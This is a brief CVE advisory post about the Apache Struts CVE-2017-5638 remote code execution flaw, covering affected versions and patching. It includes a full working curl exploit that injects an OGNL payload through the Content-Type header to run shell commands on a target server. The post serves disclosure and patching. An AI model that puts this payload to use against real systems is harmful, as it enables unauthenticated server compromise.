Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical remote code execution flaw stemming from flawed error handling in the Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header value to a server processing file uploads. If the header value is invalid, the parser attempts to generate an error message. However, it incorrectly interprets the header’s value using Object-Graph Navigation Language (OGNL) expressions. This allows an attacker to inject their own OGNL code directly into the `Content-Type` header. Since OGNL expressions can execute arbitrary system commands on the underlying server with the same privileges as the Struts application, the parser inadvertently evaluates and executes the attacker’s injected code. This bypasses all security controls, granting the attacker full control over the vulnerable system without requiring authentication.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: March 2017

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-blank/example/Upload.action`

How Exploit:

Malicious HTTP Request

Crafted Content-Type Header

OGNL Expression Injection

Protection from this CVE

Patch Struts

Upgrade Version

Input Validation

Impact:

Remote Code Execution

Full System Compromise

Unauthenticated Attack

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top